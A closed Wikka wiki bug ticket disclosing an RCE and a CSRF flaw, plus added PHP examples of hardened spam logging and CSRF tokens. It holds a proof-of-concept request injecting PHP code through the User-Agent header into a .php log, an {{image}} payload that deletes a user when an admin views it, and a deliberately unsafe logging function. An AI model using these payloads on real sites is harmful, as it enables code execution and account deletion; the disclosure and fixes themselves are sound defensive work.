Ticket #1098 (closed defect: fixed)

Opened 3 years ago

Last modified 2 years ago

RCE and CSRF vulnerabilities

Reported by: EgiX Owned by: BrianKoontz
Priority: highest Milestone: 1.3.2-patches
Component: unspecified Version: 1.3.2-p1
Severity: normal Keywords:
Cc:

Description (last modified by BrianKoontz)

I've found two other vulnerabilities.

The first is a Remote Code Execution here:

 https://wush.net/trac/wikka/browser/trunk/libs/Wakka.class.php#L1315

If the 'spam_logging' option is enabled, an attacker could inject arbitrary PHP code into the 'spamlog_path' file (by default './spamlog.txt.php') through the 'HTTP_USER_AGENT' variable. Proof of concept:

 POST /wikka/test/addcomment HTTP/1.1
 Host: localhost
 Cookie: 96522b217a86eca82f6d72ef88c4c7f4=6l11flsnvef642oajav0ufnp83
 User-Agent: <?php phpinfo(); ?>
 Content-Length: 27
 Content-Type: application/x-www-form-urlencoded
 Connection: keep-alive

 body=foo&submit=Add+Comment

The second is a Cross-Site Request Forgery vulnerability: an attacker could create a malicious page containing an {{image}} action like this:

{{image url=" http://localhost/wikka/AdminUsers?user=TestUser&action=delete"}}

When the admin visits this page, the 'TestUser' account will be deleted.
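The following is an added example, not code from the Wakka code base or from the reporter. It reproduces the logging pattern the report describes (attacker-controlled request headers appended verbatim to a file inside the webroot whose name ends in .php) next to a hardened version of the same write: tags are stripped, control characters are removed so a single request cannot forge extra log lines, the field is capped in length, and the configured path is refused if it carries an extension a web server might hand to the PHP interpreter. Function names, the log paths and the constructed request are assumptions made for illustration.

```php
<?php
// Added example (not Wakka's code): the spam-log write pattern the report
// describes, beside a hardened version. Function names, the $spamlogPath
// values and the constructed $server request below are assumptions.
declare(strict_types=1);

// Unsafe: attacker-controlled header bytes are appended verbatim to a file
// that sits in the webroot and ends in .php. Whether or not the engine ever
// executes that file, it now contains "<?php phpinfo(); ?>".
function log_spam_unsafe(string $spamlogPath, array $server, string $body): void
{
    $line = gmdate('c') . "\t" . ($server['REMOTE_ADDR'] ?? '-') . "\t"
          . ($server['HTTP_USER_AGENT'] ?? '-') . "\t" . $body . "\n";
    file_put_contents($spamlogPath, $line, FILE_APPEND | LOCK_EX);
}

// Refuse log paths with an extension the web server might pass to PHP.
function assert_non_executable_log_path(string $path): void
{
    if (preg_match('/\.(php\d*|phtml|phar|inc)$/i', $path)) {
        throw new RuntimeException("refusing to write untrusted data to $path");
    }
}

// Remove PHP/HTML tags, escape what strip_tags leaves behind, and replace
// control characters so one request cannot inject extra log lines.
function sanitize_log_field(string $value, int $max = 512): string
{
    $value = strip_tags($value);                        // drops <?php ... ?> and HTML tags
    $value = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    $value = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $value) ?? '';
    return substr($value, 0, $max);
}

function log_spam_safe(string $spamlogPath, array $server, string $body): void
{
    assert_non_executable_log_path($spamlogPath);
    $line = implode("\t", [
        gmdate('c'),
        sanitize_log_field((string) ($server['REMOTE_ADDR'] ?? '-'), 64),
        sanitize_log_field((string) ($server['HTTP_USER_AGENT'] ?? '-')),
        sanitize_log_field($body, 2048),
    ]) . "\n";
    file_put_contents($spamlogPath, $line, FILE_APPEND | LOCK_EX);
}

// Constructed request modelled on the proof of concept above (assumption).
$server = [
    'REMOTE_ADDR'     => '127.0.0.1',
    'HTTP_USER_AGENT' => "<?php phpinfo(); ?>\nforged second log line",
];
$logDir = sys_get_temp_dir();   // stand-in for a directory outside the webroot

log_spam_unsafe("$logDir/spamlog.txt.php", $server, 'foo');
log_spam_safe("$logDir/spamlog.txt", $server, 'foo');

echo "unsafe: ", file_get_contents("$logDir/spamlog.txt.php");
echo "safe:   ", file_get_contents("$logDir/spamlog.txt");

// The hardened writer refuses the default-style .php file name outright.
try {
    log_spam_safe("$logDir/spamlog.txt.php", $server, 'foo');
} catch (RuntimeException $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
```

Run with `php example.php`. The unsafe line carries the raw `<?php phpinfo(); ?>` and a newline, so it also spans two log lines; the safe line has the tag removed, the newline collapsed to a space, and the write to a `.php` name rejected. Stripping markup from the User-Agent and comment body before archiving is the same direction taken by changeset [1825] later in this ticket; keeping the log outside the document root, or at least under a non-executable name, is the second layer.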

Related tickets

#1097 Multiple Security Vulnerabilities

Change History

Changed 3 years ago by BrianKoontz

Thanks for the heads up, EgiX. I'll check these out and fix as appropriate.

Changed 2 years ago by BrianKoontz

(In [1819]) All admin actions have been converted from GET to POST requests. Ref #1098.

Changed 2 years ago by BrianKoontz

  • description modified

Changed 2 years ago by BrianKoontz

Because of the way the Wikka engine parses page requests, a user cannot view the spamlog as a PHP file. And when it's rendered in the AdminSpamLog page, it's simply displayed as a text file. Therefore, no RCE exists as described in the first example.

Changed 2 years ago by BrianKoontz

  • owner changed from unassigned to BrianKoontz
  • status changed from new to assigned
  • version changed from 1.3 to 1.3.2
  • milestone set to 1.3.3

Changed 2 years ago by BrianKoontz

  • status changed from assigned to closed
  • resolution set to fixed

Changed 2 years ago by BrianKoontz

  • version changed from 1.3.2 to trunk
  • milestone changed from 1.3.3 to 1.4

Changed 2 years ago by BrianKoontz

(In [1823]) Backported security patches #1097 and #1098 from trunk to 1.3.2-p1. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

  • version changed from trunk to 1.3.2-p1
  • milestone changed from 1.4 to 1.3.2-patches

Changed 2 years ago by BrianKoontz

(In [1825]) Removed HTML markup from UserAgent and comment body before archiving in spamlog. Refs #1098.

Changed 2 years ago by BrianKoontz

(In [1826]) Backported to 1.3.2-p2. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1829]) Backported to 1.3.2-p3. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1830]) Backported to 1.3.2p3. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1834]) Backported to 1.3.2p4. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1838]) Backported to 1.3.2-p6. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1840]) Backported to 1.3.2-p7. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1842]) Implemented CSRF tokens in all POST forms. Refs #1098.
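The following is an added example, not code from the Wakka code base or from the ticket's participants. It shows why the two CSRF commits in this ticket are complementary: moving admin actions from GET to POST (changeset [1819]) stops an `{{image url=...}}` tag from triggering the action, because an image fetch is always a GET, but an attacker page can still auto-submit a POST form; a per-session token checked with a constant-time compare (changeset [1842]) closes that. The session array, user table, handler name and request shapes are assumptions; session storage and HTML rendering are reduced to plain arrays and strings so the script runs stand-alone.

```php
<?php
// Added example (not Wakka's code). Session, user table, function names and
// the request shapes below are assumptions used to illustrate the check.
declare(strict_types=1);

// One random token per session, created on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every state-changing admin form.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// An admin action is allowed only for a POST carrying a token equal to the
// session's token; hash_equals avoids a timing side channel on the compare.
function admin_action_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;                      // an <img> fetch is a GET: never reaches the handler
    }
    if (empty($session['csrf_token']) || !isset($post['csrf_token'])) {
        return false;                      // forged POST from an attacker's auto-submitting form
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Stand-in for an AdminUsers "delete" handler operating on an in-memory table.
function handle_delete_user(string $method, array $post, array $session, array &$users): string
{
    if (!admin_action_allowed($method, $post, $session)) {
        return 'rejected';
    }
    $user = (string) ($post['user'] ?? '');
    if (!isset($users[$user])) {
        return 'no such user';
    }
    unset($users[$user]);
    return "deleted $user";
}

$session = [];
$users   = ['TestUser' => true, 'Admin' => true];

// 1. The report's vector: a GET produced by {{image url="...AdminUsers?user=TestUser&action=delete"}}.
echo handle_delete_user('GET', ['user' => 'TestUser', 'action' => 'delete'], $session, $users), "\n";

// 2. A forged POST without a token (what GET->POST alone does not stop).
echo handle_delete_user('POST', ['user' => 'TestUser', 'action' => 'delete'], $session, $users), "\n";

// 3. A forged POST with a guessed token.
echo handle_delete_user('POST', ['user' => 'TestUser', 'csrf_token' => 'guess'], $session, $users), "\n";

// 4. The admin's own form, rendered with the session token, then submitted.
echo csrf_field($session), "\n";
$legit = ['user' => 'TestUser', 'action' => 'delete', 'csrf_token' => csrf_token($session)];
echo handle_delete_user('POST', $legit, $session, $users), "\n";
echo implode(',', array_keys($users)), "\n";   // only Admin remains
```

Requests 1 to 3 return `rejected` and leave the table untouched; only request 4, which carries the token the server itself placed in the form, deletes TestUser. The token must be unguessable (here 32 random bytes from `random_bytes`) and bound to the session, and the handler has to refuse a missing token rather than fall back to the GET behaviour.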
